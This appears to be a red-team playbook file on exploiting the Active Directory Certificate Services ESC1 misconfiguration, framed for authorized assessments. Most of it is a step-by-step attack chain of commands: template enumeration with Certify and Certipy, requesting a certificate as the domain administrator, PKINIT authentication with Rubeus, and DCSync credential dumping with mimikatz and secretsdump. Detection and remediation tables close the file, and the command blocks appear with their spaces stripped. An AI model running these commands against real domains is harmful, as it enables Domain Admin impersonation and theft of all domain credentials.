Exploit misconfigured Active Directory Certificate Services (AD CS) ESC1 vulnerability to request certificates as high-privileged users and escalate domain privileges during authorized red team assessments.
cybersecurity
red-teaming
red-team
active-directory
ad-cs
esc1
certificate-abuse
privilege-escalation
domain-escalation
1.0
mahipal
MIT
Exploiting Active Directory Certificate Services ESC1
Overview
ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).
Objectives
Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
Identify vulnerable ESC1 templates with "Supply in Request" enabled
Request a certificate specifying a Domain Admin in the SAN field
Authenticate using the forged certificate via PKINIT to obtain a TGT
Escalate privileges to Domain Admin using the obtained Kerberos ticket
Document the full attack chain for the engagement report
MITRE ATT&CK Mapping
T1649 - Steal or Forge Authentication Certificates
T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
T1078.002 - Valid Accounts: Domain Accounts
T1484 - Domain Policy Modification
T1087.002 - Account Discovery: Domain Account
Implementation Steps
Phase 1: AD CS Enumeration
Enumerate Certificate Authority (CA) servers in the domain:
# Using Certify (Windows)Certify.execas# Using Certipy (Linux/Python)certipyfind-uuser@domain.local-p'Password123'-dc-ip10.10.10.1
Enumerate all certificate templates and identify vulnerable ones:
# Using Certify - find vulnerable templatesCertify.exefind/vulnerable# Using Certipy - outputs JSON and text reportscertipyfind-uuser@domain.local-p'Password123'-dc-ip10.10.10.1-vulnerable
pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon
msPKI-Enrollment-Flag does not require manager approval
Low-privileged group (Domain Users, Authenticated Users) has Enroll rights
Phase 2: Certificate Request with Arbitrary SAN
Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN:
# Using Certify (Windows)Certify.exerequest/ca:DC01.domain.local\domain-CA/template:VulnerableTemplate/altname:administrator# Using Certipy (Linux)certipyreq-uuser@domain.local-p'Password123'-ca'domain-CA'-targetDC01.domain.local-templateVulnerableTemplate-upnadministrator@domain.local
The CA issues a certificate with the Domain Admin's UPN in the SAN field
Save the output certificate in PFX/PEM format
Phase 3: Authentication with Forged Certificate
Convert the certificate if needed (Certify outputs PEM, convert to PFX):
Authenticate using PKINIT to obtain a TGT for the impersonated user:
# Using Rubeus (Windows)Rubeus.exeasktgt/user:administrator/certificate:cert.pfx/password:<pfx-password>/ptt# Using Certipy (Linux)certipyauth-pfxadministrator.pfx-dc-ip10.10.10.1
The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)
Phase 4: Domain Privilege Escalation
With the Domain Admin TGT, perform privileged operations:
# DCSync to dump all domain credentialsmimikatz.exe"lsadump::dcsync /domain:domain.local /all"# Or using secretsdump.py with the obtained NT hashsecretsdump.pydomain.local/administrator@DC01.domain.local-hashes:ntlmhash
Validate Domain Admin access:
# List domain controllersdir \\DC01.domain.local\C$# Access Domain Admin sharesdir \\DC01.domain.local\SYSVOL
Tools and Resources
Tool
Purpose
Platform
Certify
AD CS enumeration and certificate requests
Windows (.NET)
Certipy
AD CS enumeration, request, and authentication
Linux (Python)
Rubeus
Kerberos authentication with certificates (PKINIT)
Windows (.NET)
Mimikatz
Credential dumping post-escalation
Windows
secretsdump.py
Remote credential dumping (Impacket)
Linux (Python)
PSPKIAudit
PowerShell AD CS auditing module
Windows
ForgeCert
Certificate forgery tool
Windows (.NET)
Vulnerable Template Indicators
Condition
Vulnerable Value
msPKI-Certificate-Name-Flag
ENROLLEE_SUPPLIES_SUBJECT (1)
pkiExtendedKeyUsage
Client Authentication (1.3.6.1.5.5.7.3.2)
Enrollment Rights
Domain Users or Authenticated Users
msPKI-Enrollment-Flag
No manager approval required
CA Setting
No approval workflow enforced
Detection Signatures
Indicator
Detection Method
Certificate request with SAN different from requester
Windows Event 4886 / 4887 on CA server
Unusual PKINIT authentication
Event 4768 with certificate-based pre-auth
Certify.exe or Certipy execution
EDR process monitoring and command-line logging
Mass certificate template enumeration
LDAP query monitoring for pkiCertificateTemplate objects
Certificate issued to non-matching UPN
CA audit logs and certificate transparency
Validation Criteria
AD CS Certificate Authority enumerated
Vulnerable ESC1 templates identified with Certify or Certipy
Certificate requested with Domain Admin SAN successfully
PKINIT authentication performed with forged certificate
Domain Admin TGT obtained
Privileged access to domain controller validated
Full attack chain documented with evidence
Remediation recommendations provided (disable Supply in Request, require manager approval)